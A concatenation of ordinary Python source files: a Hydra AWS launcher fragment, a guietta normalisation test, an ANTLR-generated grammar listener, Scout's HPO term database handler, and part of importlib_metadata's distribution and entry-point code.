def setup(
self,
*,
hydra_context: HydraContext,
task_function: TaskFunction,
config: DictConfig,
) -> None:
self.config = config
self.hydra_context = hydra_context
self.task_function = task_function
def launch(
self, job_overrides: Sequence[Sequence[str]], initial_job_idx: int
) -> Sequence[JobReturn]:
from . import _core_aws
return _core_aws.launch(
launcher=self, job_overrides=job_overrides, initial_job_idx=initial_job_idx
)
|
py | 1a37e2913f22d6a21216335e609f32d614790faa | # -*- coding: utf-8 -*-
import unittest
from guietta.guietta import _normalize
class NormalizeTest(unittest.TestCase):
def test_normal_chars(self):
a = 'foobar'
assert _normalize(a) == a
def test_normal_chars2(self):
a = 'FooBar_123'
assert _normalize(a) == a
def test_special_chars(self):
a = 'Foo!Bar?-/4+`\\ 123:*'
assert _normalize(a) == 'FooBar4123'
|
py | 1a37e2d58cf451b706a16f0186a38540a4cee032 | # Generated from ANTLRv4Parser.g4 by ANTLR 4.9.2
from antlr4 import *
if __name__ is not None and "." in __name__:
from .ANTLRv4Parser import ANTLRv4Parser
else:
from ANTLRv4Parser import ANTLRv4Parser
# This class defines a complete listener for a parse tree produced by ANTLRv4Parser.
class ANTLRv4ParserListener(ParseTreeListener):
# Enter a parse tree produced by ANTLRv4Parser#grammarSpec.
def enterGrammarSpec(self, ctx:ANTLRv4Parser.GrammarSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#grammarSpec.
def exitGrammarSpec(self, ctx:ANTLRv4Parser.GrammarSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#grammarDecl.
def enterGrammarDecl(self, ctx:ANTLRv4Parser.GrammarDeclContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#grammarDecl.
def exitGrammarDecl(self, ctx:ANTLRv4Parser.GrammarDeclContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#grammarType.
def enterGrammarType(self, ctx:ANTLRv4Parser.GrammarTypeContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#grammarType.
def exitGrammarType(self, ctx:ANTLRv4Parser.GrammarTypeContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#prequelConstruct.
def enterPrequelConstruct(self, ctx:ANTLRv4Parser.PrequelConstructContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#prequelConstruct.
def exitPrequelConstruct(self, ctx:ANTLRv4Parser.PrequelConstructContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#optionsSpec.
def enterOptionsSpec(self, ctx:ANTLRv4Parser.OptionsSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#optionsSpec.
def exitOptionsSpec(self, ctx:ANTLRv4Parser.OptionsSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#option.
def enterOption(self, ctx:ANTLRv4Parser.OptionContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#option.
def exitOption(self, ctx:ANTLRv4Parser.OptionContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#optionValue.
def enterOptionValue(self, ctx:ANTLRv4Parser.OptionValueContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#optionValue.
def exitOptionValue(self, ctx:ANTLRv4Parser.OptionValueContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#delegateGrammars.
def enterDelegateGrammars(self, ctx:ANTLRv4Parser.DelegateGrammarsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#delegateGrammars.
def exitDelegateGrammars(self, ctx:ANTLRv4Parser.DelegateGrammarsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#delegateGrammar.
def enterDelegateGrammar(self, ctx:ANTLRv4Parser.DelegateGrammarContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#delegateGrammar.
def exitDelegateGrammar(self, ctx:ANTLRv4Parser.DelegateGrammarContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#tokensSpec.
def enterTokensSpec(self, ctx:ANTLRv4Parser.TokensSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#tokensSpec.
def exitTokensSpec(self, ctx:ANTLRv4Parser.TokensSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#channelsSpec.
def enterChannelsSpec(self, ctx:ANTLRv4Parser.ChannelsSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#channelsSpec.
def exitChannelsSpec(self, ctx:ANTLRv4Parser.ChannelsSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#idList.
def enterIdList(self, ctx:ANTLRv4Parser.IdListContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#idList.
def exitIdList(self, ctx:ANTLRv4Parser.IdListContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#action_.
def enterAction_(self, ctx:ANTLRv4Parser.Action_Context):
pass
# Exit a parse tree produced by ANTLRv4Parser#action_.
def exitAction_(self, ctx:ANTLRv4Parser.Action_Context):
pass
# Enter a parse tree produced by ANTLRv4Parser#actionScopeName.
def enterActionScopeName(self, ctx:ANTLRv4Parser.ActionScopeNameContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#actionScopeName.
def exitActionScopeName(self, ctx:ANTLRv4Parser.ActionScopeNameContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#actionBlock.
def enterActionBlock(self, ctx:ANTLRv4Parser.ActionBlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#actionBlock.
def exitActionBlock(self, ctx:ANTLRv4Parser.ActionBlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#argActionBlock.
def enterArgActionBlock(self, ctx:ANTLRv4Parser.ArgActionBlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#argActionBlock.
def exitArgActionBlock(self, ctx:ANTLRv4Parser.ArgActionBlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#modeSpec.
def enterModeSpec(self, ctx:ANTLRv4Parser.ModeSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#modeSpec.
def exitModeSpec(self, ctx:ANTLRv4Parser.ModeSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#rules.
def enterRules(self, ctx:ANTLRv4Parser.RulesContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#rules.
def exitRules(self, ctx:ANTLRv4Parser.RulesContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleSpec.
def enterRuleSpec(self, ctx:ANTLRv4Parser.RuleSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleSpec.
def exitRuleSpec(self, ctx:ANTLRv4Parser.RuleSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#parserRuleSpec.
def enterParserRuleSpec(self, ctx:ANTLRv4Parser.ParserRuleSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#parserRuleSpec.
def exitParserRuleSpec(self, ctx:ANTLRv4Parser.ParserRuleSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#exceptionGroup.
def enterExceptionGroup(self, ctx:ANTLRv4Parser.ExceptionGroupContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#exceptionGroup.
def exitExceptionGroup(self, ctx:ANTLRv4Parser.ExceptionGroupContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#exceptionHandler.
def enterExceptionHandler(self, ctx:ANTLRv4Parser.ExceptionHandlerContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#exceptionHandler.
def exitExceptionHandler(self, ctx:ANTLRv4Parser.ExceptionHandlerContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#finallyClause.
def enterFinallyClause(self, ctx:ANTLRv4Parser.FinallyClauseContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#finallyClause.
def exitFinallyClause(self, ctx:ANTLRv4Parser.FinallyClauseContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#rulePrequel.
def enterRulePrequel(self, ctx:ANTLRv4Parser.RulePrequelContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#rulePrequel.
def exitRulePrequel(self, ctx:ANTLRv4Parser.RulePrequelContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleReturns.
def enterRuleReturns(self, ctx:ANTLRv4Parser.RuleReturnsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleReturns.
def exitRuleReturns(self, ctx:ANTLRv4Parser.RuleReturnsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#throwsSpec.
def enterThrowsSpec(self, ctx:ANTLRv4Parser.ThrowsSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#throwsSpec.
def exitThrowsSpec(self, ctx:ANTLRv4Parser.ThrowsSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#localsSpec.
def enterLocalsSpec(self, ctx:ANTLRv4Parser.LocalsSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#localsSpec.
def exitLocalsSpec(self, ctx:ANTLRv4Parser.LocalsSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleAction.
def enterRuleAction(self, ctx:ANTLRv4Parser.RuleActionContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleAction.
def exitRuleAction(self, ctx:ANTLRv4Parser.RuleActionContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleModifiers.
def enterRuleModifiers(self, ctx:ANTLRv4Parser.RuleModifiersContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleModifiers.
def exitRuleModifiers(self, ctx:ANTLRv4Parser.RuleModifiersContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleModifier.
def enterRuleModifier(self, ctx:ANTLRv4Parser.RuleModifierContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleModifier.
def exitRuleModifier(self, ctx:ANTLRv4Parser.RuleModifierContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleBlock.
def enterRuleBlock(self, ctx:ANTLRv4Parser.RuleBlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleBlock.
def exitRuleBlock(self, ctx:ANTLRv4Parser.RuleBlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleAltList.
def enterRuleAltList(self, ctx:ANTLRv4Parser.RuleAltListContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleAltList.
def exitRuleAltList(self, ctx:ANTLRv4Parser.RuleAltListContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#labeledAlt.
def enterLabeledAlt(self, ctx:ANTLRv4Parser.LabeledAltContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#labeledAlt.
def exitLabeledAlt(self, ctx:ANTLRv4Parser.LabeledAltContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerRuleSpec.
def enterLexerRuleSpec(self, ctx:ANTLRv4Parser.LexerRuleSpecContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerRuleSpec.
def exitLexerRuleSpec(self, ctx:ANTLRv4Parser.LexerRuleSpecContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerRuleBlock.
def enterLexerRuleBlock(self, ctx:ANTLRv4Parser.LexerRuleBlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerRuleBlock.
def exitLexerRuleBlock(self, ctx:ANTLRv4Parser.LexerRuleBlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerAltList.
def enterLexerAltList(self, ctx:ANTLRv4Parser.LexerAltListContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerAltList.
def exitLexerAltList(self, ctx:ANTLRv4Parser.LexerAltListContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerAlt.
def enterLexerAlt(self, ctx:ANTLRv4Parser.LexerAltContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerAlt.
def exitLexerAlt(self, ctx:ANTLRv4Parser.LexerAltContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerElements.
def enterLexerElements(self, ctx:ANTLRv4Parser.LexerElementsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerElements.
def exitLexerElements(self, ctx:ANTLRv4Parser.LexerElementsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerElement.
def enterLexerElement(self, ctx:ANTLRv4Parser.LexerElementContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerElement.
def exitLexerElement(self, ctx:ANTLRv4Parser.LexerElementContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#labeledLexerElement.
def enterLabeledLexerElement(self, ctx:ANTLRv4Parser.LabeledLexerElementContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#labeledLexerElement.
def exitLabeledLexerElement(self, ctx:ANTLRv4Parser.LabeledLexerElementContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerBlock.
def enterLexerBlock(self, ctx:ANTLRv4Parser.LexerBlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerBlock.
def exitLexerBlock(self, ctx:ANTLRv4Parser.LexerBlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerCommands.
def enterLexerCommands(self, ctx:ANTLRv4Parser.LexerCommandsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerCommands.
def exitLexerCommands(self, ctx:ANTLRv4Parser.LexerCommandsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerCommand.
def enterLexerCommand(self, ctx:ANTLRv4Parser.LexerCommandContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerCommand.
def exitLexerCommand(self, ctx:ANTLRv4Parser.LexerCommandContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerCommandName.
def enterLexerCommandName(self, ctx:ANTLRv4Parser.LexerCommandNameContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerCommandName.
def exitLexerCommandName(self, ctx:ANTLRv4Parser.LexerCommandNameContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerCommandExpr.
def enterLexerCommandExpr(self, ctx:ANTLRv4Parser.LexerCommandExprContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerCommandExpr.
def exitLexerCommandExpr(self, ctx:ANTLRv4Parser.LexerCommandExprContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#altList.
def enterAltList(self, ctx:ANTLRv4Parser.AltListContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#altList.
def exitAltList(self, ctx:ANTLRv4Parser.AltListContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#alternative.
def enterAlternative(self, ctx:ANTLRv4Parser.AlternativeContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#alternative.
def exitAlternative(self, ctx:ANTLRv4Parser.AlternativeContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#element.
def enterElement(self, ctx:ANTLRv4Parser.ElementContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#element.
def exitElement(self, ctx:ANTLRv4Parser.ElementContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#elements.
def enterElements(self, ctx:ANTLRv4Parser.ElementsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#elements.
def exitElements(self, ctx:ANTLRv4Parser.ElementsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#labeledElement.
def enterLabeledElement(self, ctx:ANTLRv4Parser.LabeledElementContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#labeledElement.
def exitLabeledElement(self, ctx:ANTLRv4Parser.LabeledElementContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ebnf.
def enterEbnf(self, ctx:ANTLRv4Parser.EbnfContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ebnf.
def exitEbnf(self, ctx:ANTLRv4Parser.EbnfContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#blockSuffix.
def enterBlockSuffix(self, ctx:ANTLRv4Parser.BlockSuffixContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#blockSuffix.
def exitBlockSuffix(self, ctx:ANTLRv4Parser.BlockSuffixContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ebnfSuffix.
def enterEbnfSuffix(self, ctx:ANTLRv4Parser.EbnfSuffixContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ebnfSuffix.
def exitEbnfSuffix(self, ctx:ANTLRv4Parser.EbnfSuffixContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#lexerAtom.
def enterLexerAtom(self, ctx:ANTLRv4Parser.LexerAtomContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#lexerAtom.
def exitLexerAtom(self, ctx:ANTLRv4Parser.LexerAtomContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#atom.
def enterAtom(self, ctx:ANTLRv4Parser.AtomContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#atom.
def exitAtom(self, ctx:ANTLRv4Parser.AtomContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#notSet.
def enterNotSet(self, ctx:ANTLRv4Parser.NotSetContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#notSet.
def exitNotSet(self, ctx:ANTLRv4Parser.NotSetContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#blockSet.
def enterBlockSet(self, ctx:ANTLRv4Parser.BlockSetContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#blockSet.
def exitBlockSet(self, ctx:ANTLRv4Parser.BlockSetContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#setElement.
def enterSetElement(self, ctx:ANTLRv4Parser.SetElementContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#setElement.
def exitSetElement(self, ctx:ANTLRv4Parser.SetElementContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#block.
def enterBlock(self, ctx:ANTLRv4Parser.BlockContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#block.
def exitBlock(self, ctx:ANTLRv4Parser.BlockContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#ruleref.
def enterRuleref(self, ctx:ANTLRv4Parser.RulerefContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#ruleref.
def exitRuleref(self, ctx:ANTLRv4Parser.RulerefContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#characterRange.
def enterCharacterRange(self, ctx:ANTLRv4Parser.CharacterRangeContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#characterRange.
def exitCharacterRange(self, ctx:ANTLRv4Parser.CharacterRangeContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#terminal.
def enterTerminal(self, ctx:ANTLRv4Parser.TerminalContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#terminal.
def exitTerminal(self, ctx:ANTLRv4Parser.TerminalContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#elementOptions.
def enterElementOptions(self, ctx:ANTLRv4Parser.ElementOptionsContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#elementOptions.
def exitElementOptions(self, ctx:ANTLRv4Parser.ElementOptionsContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#elementOption.
def enterElementOption(self, ctx:ANTLRv4Parser.ElementOptionContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#elementOption.
def exitElementOption(self, ctx:ANTLRv4Parser.ElementOptionContext):
pass
# Enter a parse tree produced by ANTLRv4Parser#identifier.
def enterIdentifier(self, ctx:ANTLRv4Parser.IdentifierContext):
pass
# Exit a parse tree produced by ANTLRv4Parser#identifier.
def exitIdentifier(self, ctx:ANTLRv4Parser.IdentifierContext):
pass
del ANTLRv4Parser |
py | 1a37e37e9c7dd1df14034797bf172e3cc7942369 | # -*- coding: utf-8 -*-
import logging
import operator
from pymongo.errors import DuplicateKeyError, BulkWriteError
import pymongo
from anytree import RenderTree, Node, search, resolver
from anytree.exporter import DictExporter
from scout.exceptions import IntegrityError
LOG = logging.getLogger(__name__)
class HpoHandler(object):
def load_hpo_term(self, hpo_obj):
"""Add a hpo object
Arguments:
hpo_obj(dict)
"""
LOG.debug("Loading hpo term %s into database", hpo_obj["_id"])
try:
self.hpo_term_collection.insert_one(hpo_obj)
except DuplicateKeyError as err:
raise IntegrityError("Hpo term %s already exists in database".format(hpo_obj["_id"]))
LOG.debug("Hpo term saved")
def load_hpo_bulk(self, hpo_bulk):
"""Add a hpo object
Arguments:
hpo_bulk(list(scout.models.HpoTerm))
Returns:
result: pymongo bulkwrite result
"""
LOG.debug("Loading hpo bulk")
try:
result = self.hpo_term_collection.insert_many(hpo_bulk)
except (DuplicateKeyError, BulkWriteError) as err:
raise IntegrityError(err)
return result
def hpo_term(self, hpo_id):
"""Fetch a hpo term
Args:
hpo_id(str)
Returns:
hpo_obj(dict)
"""
LOG.debug("Fetching hpo term %s", hpo_id)
return self.hpo_term_collection.find_one({"_id": hpo_id})
def hpo_terms(self, query=None, hpo_term=None, text=None, limit=None):
"""Return all HPO terms
If a query is sent hpo_terms will try to match with regex on term or
description.
Args:
query(str): Part of a hpoterm or description
hpo_term(str): Search for a specific hpo term
limit(int): the number of desired results
Returns:
result(pymongo.Cursor): A cursor with hpo terms
"""
query_dict = {}
search_term = None
if query:
query_dict = {
"$or": [
{"hpo_id": {"$regex": query, "$options": "i"}},
{"description": {"$regex": query, "$options": "i"}},
]
}
search_term = query
elif text:
new_string = ""
for i, word in enumerate(text.split(" ")):
if i == 0:
new_string += word
else:
new_string += ' "{0}"'.format(word)
LOG.info("Search HPO terms with %s", new_string)
query_dict["$text"] = {"$search": new_string}
search_term = text
elif hpo_term:
query_dict["hpo_id"] = hpo_term
search_term = hpo_term
limit = limit or 0
res = (
self.hpo_term_collection.find(query_dict)
.limit(limit)
.sort("hpo_number", pymongo.ASCENDING)
)
return res
def generate_hpo_gene_list(self, *hpo_terms):
"""Generate a sorted list with namedtuples of hpogenes
Each namedtuple of the list looks like (hgnc_id, count)
Args:
hpo_terms(iterable(str))
Returns:
hpo_genes(list(HpoGene))
"""
genes = {}
for term in hpo_terms:
hpo_obj = self.hpo_term(term)
if hpo_obj:
for hgnc_id in hpo_obj["genes"]:
if hgnc_id in genes:
genes[hgnc_id] += 1
else:
genes[hgnc_id] = 1
else:
LOG.warning("Term %s could not be found", term)
sorted_genes = sorted(genes.items(), key=operator.itemgetter(1), reverse=True)
return sorted_genes
def organize_tree(self, all_terms, root):
"""Organizes a set of Tree node objects into a tree, according to their ancestors and children
Args:
all_terms(dict): a dictionary with "term_name" as keys and term_dict as values
root(anytree.Node)
Returns
root(anytree.Node): the updated root node of the tree
"""
# Move tree nodes in the right position according to the ontology
for key, term in all_terms.items():
ancestors = term["ancestors"]
if len(ancestors) == 0:
continue
for ancestor in ancestors:
ancestor_node = search.find_by_attr(root, ancestor)
if ancestor_node is None: # It's probably the term on the top
continue
node = search.find_by_attr(root, key)
node.parent = ancestor_node
return root
def build_phenotype_tree(self, hpo_id):
"""Creates an HPO Tree based on one or more given ancestors
Args:
hpo_id(str): an HPO term
Returns:
tree_dict(dict): a tree of all HPO children of the given term, as a dictionary
"""
root = Node(id="root", name="root", parent=None)
all_terms = {}
unique_terms = set()
def _hpo_terms_list(hpo_ids):
for term_id in hpo_ids:
term_obj = self.hpo_term(term_id)
if term_obj is None:
continue
# sort term children by ascending HPO number
children = sorted(
term_obj["children"], key=lambda x: int("".join([i for i in x if i.isdigit()]))
)
term_obj["children"] = children
all_terms[term_id] = term_obj
if term_id not in unique_terms:
node = Node(term_id, parent=root, description=term_obj["description"])
unique_terms.add(term_id)
# recursive loop to collect children, children of children and so on
_hpo_terms_list(term_obj["children"])
# compile a list of all HPO term objects to include in the submodel
_hpo_terms_list([hpo_id]) # trigger the recursive loop to collect nested HPO terms
# rearrange tree according to the HPO ontology
root = self.organize_tree(all_terms, root)
node_resolver = resolver.Resolver("name")
# Extract a tree structure having the chosen HPO term (hpo_id) as ancestor of all the children terms
term_node = node_resolver.get(root, hpo_id)
LOG.info(f"Built ontology for HPO term:{hpo_id}:\n{RenderTree(term_node)}")
exporter = DictExporter()
# Export this tree structure as dictionary, so that can be saved in database
tree_dict = exporter.export(term_node)
return tree_dict
|
py | 1a37e37f08b542bebde96c6a73d2c11a4efd2fa4 | from __future__ import unicode_literals, absolute_import
import io
import os
import re
import abc
import csv
import sys
import zipp
import operator
import functools
import itertools
import collections
from ._compat import (
install,
NullFinder,
ConfigParser,
suppress,
map,
FileNotFoundError,
IsADirectoryError,
NotADirectoryError,
PermissionError,
pathlib,
PYPY_OPEN_BUG,
ModuleNotFoundError,
MetaPathFinder,
email_message_from_string,
ensure_is_path,
)
from importlib import import_module
from itertools import starmap
__metaclass__ = type
__all__ = [
'Distribution',
'DistributionFinder',
'PackageNotFoundError',
'distribution',
'distributions',
'entry_points',
'files',
'metadata',
'requires',
'version',
]
class PackageNotFoundError(ModuleNotFoundError):
"""The package was not found."""
class EntryPoint(collections.namedtuple('EntryPointBase', 'name value group')):
"""An entry point as defined by Python packaging conventions.
See `the packaging docs on entry points
<https://packaging.python.org/specifications/entry-points/>`_
for more information.
"""
pattern = re.compile(
r'(?P<module>[\w.]+)\s*'
r'(:\s*(?P<attr>[\w.]+))?\s*'
r'(?P<extras>\[.*\])?\s*$'
)
"""
A regular expression describing the syntax for an entry point,
which might look like:
- module
- package.module
- package.module:attribute
- package.module:object.attribute
- package.module:attr [extra1, extra2]
Other combinations are possible as well.
The expression is lenient about whitespace around the ':',
following the attr, and following any extras.
"""
def load(self):
"""Load the entry point from its definition. If only a module
is indicated by the value, return that module. Otherwise,
return the named object.
"""
match = self.pattern.match(self.value)
module = import_module(match.group('module'))
attrs = filter(None, (match.group('attr') or '').split('.'))
return functools.reduce(getattr, attrs, module)
@property
def extras(self):
match = self.pattern.match(self.value)
return list(re.finditer(r'\w+', match.group('extras') or ''))
@classmethod
def _from_config(cls, config):
return [
cls(name, value, group)
for group in config.sections()
for name, value in config.items(group)
]
@classmethod
def _from_text(cls, text):
config = ConfigParser(delimiters='=')
# case sensitive: https://stackoverflow.com/q/1611799/812183
config.optionxform = str
try:
config.read_string(text)
except AttributeError: # pragma: nocover
# Python 2 has no read_string
config.readfp(io.StringIO(text))
return EntryPoint._from_config(config)
def __iter__(self):
"""
Supply iter so one may construct dicts of EntryPoints easily.
"""
return iter((self.name, self))
class PackagePath(pathlib.PurePosixPath):
"""A reference to a path in a package"""
def read_text(self, encoding='utf-8'):
with self.locate().open(encoding=encoding) as stream:
return stream.read()
def read_binary(self):
with self.locate().open('rb') as stream:
return stream.read()
def locate(self):
"""Return a path-like object for this path"""
return self.dist.locate_file(self)
class FileHash:
def __init__(self, spec):
self.mode, _, self.value = spec.partition('=')
def __repr__(self):
return '<FileHash mode: {} value: {}>'.format(self.mode, self.value)
class Distribution:
"""A Python distribution package."""
@abc.abstractmethod
def read_text(self, filename):
"""Attempt to load metadata file given by the name.
:param filename: The name of the file in the distribution info.
:return: The text if found, otherwise None.
"""
@abc.abstractmethod
def locate_file(self, path):
"""
Given a path to a file in this distribution, return a path
to it.
"""
@classmethod
def from_name(cls, name):
"""Return the Distribution for the given package name.
:param name: The name of the distribution package to search for.
:return: The Distribution instance (or subclass thereof) for the named
package, if found.
:raises PackageNotFoundError: When the named package's distribution
metadata cannot be found.
"""
for resolver in cls._discover_resolvers():
dists = resolver(DistributionFinder.Context(name=name))
dist = next(dists, None)
if dist is not None:
return dist
else:
raise PackageNotFoundError(name)
@classmethod
def discover(cls, **kwargs):
"""Return an iterable of Distribution objects for all packages.
Pass a ``context`` or pass keyword arguments for constructing
a context.
:context: A ``DistributionFinder.Context`` object.
:return: Iterable of Distribution objects for all packages.
"""
context = kwargs.pop('context', None)
if context and kwargs:
raise ValueError("cannot accept context and kwargs")
context = context or DistributionFinder.Context(**kwargs)
return itertools.chain.from_iterable(
resolver(context)
for resolver in cls._discover_resolvers()
)
@staticmethod
def at(path):
"""Return a Distribution for the indicated metadata path
:param path: a string or path-like object
:return: a concrete Distribution instance for the path
"""
return PathDistribution(ensure_is_path(path))
@staticmethod
def _discover_resolvers():
"""Search the meta_path for resolvers."""
declared = (
getattr(finder, 'find_distributions', None)
for finder in sys.meta_path
)
return filter(None, declared)
@property
def metadata(self):
"""Return the parsed metadata for this Distribution.
The returned object will have keys that name the various bits of
metadata. See PEP 566 for details.
"""
text = (
self.read_text('METADATA')
or self.read_text('PKG-INFO')
# This last clause is here to support old egg-info files. Its
# effect is to just end up using the PathDistribution's self._path
# (which points to the egg-info file) attribute unchanged.
or self.read_text('')
)
return email_message_from_string(text)
@property
def version(self):
"""Return the 'Version' metadata for the distribution package."""
return self.metadata['Version']
@property
def entry_points(self):
return EntryPoint._from_text(self.read_text('entry_points.txt'))
@property
def files(self):
"""Files in this distribution.
:return: List of PackagePath for this distribution or None
Result is `None` if the metadata file that enumerates files
(i.e. RECORD for dist-info or SOURCES.txt for egg-info) is
missing.
Result may be empty if the metadata exists but is empty.
"""
file_lines = self._read_files_distinfo() or self._read_files_egginfo()
def make_file(name, hash=None, size_str=None):
result = PackagePath(name)
result.hash = FileHash(hash) if hash else None
result.size = int(size_str) if size_str else None
result.dist = self
return result
return file_lines and list(starmap(make_file, csv.reader(file_lines)))
def _read_files_distinfo(self):
"""
Read the lines of RECORD
"""
text = self.read_text('RECORD')
return text and text.splitlines()
def _read_files_egginfo(self):
"""
SOURCES.txt might contain literal commas, so wrap each line
in quotes.
"""
text = self.read_text('SOURCES.txt')
return text and map('"{}"'.format, text.splitlines())
@property
def requires(self):
"""Generated requirements specified for this Distribution"""
reqs = self._read_dist_info_reqs() or self._read_egg_info_reqs()
return reqs and list(reqs)
def _read_dist_info_reqs(self):
return self.metadata.get_all('Requires-Dist')
def _read_egg_info_reqs(self):
source = self.read_text('requires.txt')
return source and self._deps_from_requires_text(source)
@classmethod
def _deps_from_requires_text(cls, source):
section_pairs = cls._read_sections(source.splitlines())
sections = {
section: list(map(operator.itemgetter('line'), results))
for section, results in
itertools.groupby(section_pairs, operator.itemgetter('section'))
}
return cls._convert_egg_info_reqs_to_simple_reqs(sections)
@staticmethod
def _read_sections(lines):
section = None
